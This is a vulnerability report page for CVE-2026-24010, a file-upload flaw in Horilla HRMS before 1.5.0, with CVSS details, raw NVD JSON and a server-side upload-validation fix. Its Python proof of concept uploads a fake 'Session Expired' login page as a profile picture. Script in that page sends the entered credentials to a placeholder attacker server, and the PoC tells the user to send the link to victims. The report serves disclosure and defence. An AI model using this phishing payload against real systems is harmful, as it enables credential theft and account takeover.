Security Vulnerability Report
CVE-2026-24010 CVSS 8.0 HIGH

CVE-2026-24010

Published: 2026-01-22 03:15:48
Last Modified: 2026-01-29 20:00:49

Description

Horilla is a free and open source Human Resource Management System (HRMS). A critical File Upload vulnerability in versions prior to 1.5.0, with Social Engineering, allows authenticated users to deploy phishing attacks. By uploading a malicious HTML file disguised as a profile picture, an attacker can create a convincing login page replica that steals user credentials. When a victim visits the uploaded file URL, they see an authentic-looking "Session Expired" message prompting them to re-authenticate. All entered credentials are captured and sent to the attacker's server, enabling Account Takeover. Version 1.5.0 patches the issue.

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:horilla:horilla:*:*:*:*:*:*:*:* - VULNERABLE
Horilla HRMS < 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2026-24010 PoC - Horilla HRMS File Upload Phishing Attack
# Target: Horilla HRMS < 1.5.0

TARGET_URL = "http://target-horilla-server.com"
ATTACKER_SERVER = "http://attacker-controlled-server.com"

# Malicious HTML payload disguised as profile picture
PHISHING_HTML = '''
<!DOCTYPE html>
<html>
<head>
    <title>Session Expired - Horilla HRMS</title>
    <style>
        body { font-family: Arial, sans-serif; background: #f0f2f5; }
        .login-box { width: 350px; margin: 100px auto; padding: 20px; background: white; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
        h2 { text-align: center; color: #333; }
        input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 4px; box-sizing: border-box; }
        button { width: 100%; padding: 10px; background: #1877f2; color: white; border: none; border-radius: 4px; cursor: pointer; }
        button:hover { background: #166fe5; }
        .warning { text-align: center; color: #666; font-size: 14px; margin-bottom: 20px; }
    </style>
</head>
<body>
    <div class="login-box">
        <h2>Horilla HRMS</h2>
        <p class="warning">Your session has expired. Please login again.</p>
        <form id="phishForm">
            <input type="text" name="username" placeholder="Username" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Login</button>
        </form>
    </div>
    <script>
        document.getElementById('phishForm').addEventListener('submit', function(e) {
            e.preventDefault();
            var formData = new FormData(this);
            fetch('ATTACKER_SERVER/log.php?cve=2026-24010', { method: 'POST', body: formData }).then(() => {
                // Redirect to legitimate login page after capturing credentials
                window.location.href = 'TARGET_URL/auth/login/?next=/';
            });
        });
    </script>
</body>
</html>
'''

def exploit():
    # Step 1: Authenticate with valid credentials
    session = requests.Session()
    login_url = f"{TARGET_URL}/auth/login/"
    login_data = {'username': 'attacker_account', 'password': 'attacker_password'}
    response = session.post(login_url, data=login_data)
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False
    print("[+] Authentication successful")

    # Step 2: Upload malicious HTML file as profile picture
    upload_url = f"{TARGET_URL}/employee/profile/update/"
    files = {'profile_picture': ('session_expired.html', PHISHING_HTML, 'text/html')}
    response = session.post(upload_url, files=files)
    if response.status_code == 200:
        # Extract uploaded file URL from response
        # Pattern: /media/avatar/
        print("[+] Malicious file uploaded successfully")
        phishing_url = extract_uploaded_url(response)  # helper is not defined in the published PoC
        print(f"[+] Phishing URL: {phishing_url}")
        print(f"[+] Send this URL to victims to capture credentials")
        return True
    else:
        print("[-] File upload failed")
        return False

if __name__ == "__main__":
    exploit()
```
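Added mitigation example, written for this report and not taken from the advisory or the Horilla code base: the server-side upload check that closes this class of bug (CWE-434, unrestricted upload of a dangerous file type). It accepts a profile picture only when the extension is on an image allowlist and the leading bytes carry a matching image signature, rejects image/HTML polyglots, discards the client-supplied filename, and lists response headers for the media route so that a stray file is downloaded rather than rendered. The function names, allowlist and size limit are assumptions.

```python
import re
from typing import Optional, Tuple

# Constructed allowlist: extension -> magic-byte prefixes a genuine image of that type starts with.
IMAGE_SIGNATURES = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}
MAX_BYTES = 2 * 1024 * 1024  # assumed avatar size limit
# Markup that has no business inside an avatar; catches image/HTML polyglots such as "GIF89a<script>".
HTML_MARKERS = re.compile(rb"<\s*(!doctype\s+html|html|script|iframe|svg)\b", re.I)

def sniff_image_type(data: bytes) -> Optional[str]:
    """Identify the image type from leading bytes, ignoring whatever the client claimed."""
    for ext, prefixes in IMAGE_SIGNATURES.items():
        if any(data.startswith(p) for p in prefixes):
            return "jpg" if ext == "jpeg" else ext
    return None

def validate_profile_picture(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). The bytes decide the type; the filename must agree with them."""
    if not data or len(data) > MAX_BYTES:
        return False, "empty or oversized upload"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension '.{ext}' not in image allowlist"
    sniffed = sniff_image_type(data)
    if sniffed is None:
        return False, "content is not a recognised image"
    if HTML_MARKERS.search(data[:4096]):
        return False, "content contains HTML/script markup"
    if sniffed != ("jpg" if ext == "jpeg" else ext):
        return False, f"extension '.{ext}' does not match content ({sniffed})"
    return True, "ok"

def stored_name(user_id: int, data: bytes) -> str:
    """Server-chosen name: the client filename is discarded and the extension comes from the bytes."""
    return f"avatar_{user_id}.{sniff_image_type(data)}"

def media_response_headers() -> dict:
    """Headers for the media route so a file that slips through is downloaded, never rendered as a page."""
    return {
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
```

With these checks the PoC's `session_expired.html` upload fails at the extension test, and a renamed copy fails at the signature test.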

References

https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 (Release Notes)
https://github.com/horilla-opensource/horilla/security/advisories/GHSA-5jfv-gw8w-49h3 (Exploit, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-24010",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-22T03:15:48.090",
    "lastModified": "2026-01-29T20:00:49.013",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Horilla is a free and open source Human Resource Management System (HRMS). A critical File Upload vulnerability in versions prior to 1.5.0, with Social Engineering, allows authenticated users to deploy phishing attacks. By uploading a malicious HTML file disguised as a profile picture, an attacker can create a convincing login page replica that steals user credentials. When a victim visits the uploaded file URL, they see an authentic-looking \"Session Expired\" message prompting them to re-authenticate. All entered credentials are captured and sent to the attacker's server, enabling Account Takeover. Version 1.5.0 patches the issue."
      },
      {
        "lang": "es",
        "value": "Horilla es un Sistema de Gestión de Recursos Humanos (HRMS) de código abierto y gratuito. Una vulnerabilidad crítica de carga de archivos en versiones anteriores a la 1.5.0, con ingeniería social, permite a usuarios autenticados desplegar ataques de phishing. Al cargar un archivo HTML malicioso disfrazado como una imagen de perfil, un atacante puede crear una réplica convincente de página de inicio de sesión que roba credenciales de usuario. Cuando una víctima visita la URL del archivo cargado, ve un mensaje de 'Sesión Expirada' de aspecto auténtico que les solicita volver a autenticarse. Todas las credenciales introducidas son capturadas y enviadas al servidor del atacante, lo que permite la toma de control de cuentas. La versión 1.5.0 corrige el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.0,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 5.9
        }
      ],
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-74"},
          {"lang": "en", "value": "CWE-474"}
        ]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-434"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:horilla:horilla:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.5.0",
                "matchCriteriaId": "57934F7E-B93F-40A5-9E9A-CB97D7568936"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/horilla-opensource/horilla/releases/tag/1.5.0",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/horilla-opensource/horilla/security/advisories/GHSA-5jfv-gw8w-49h3",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```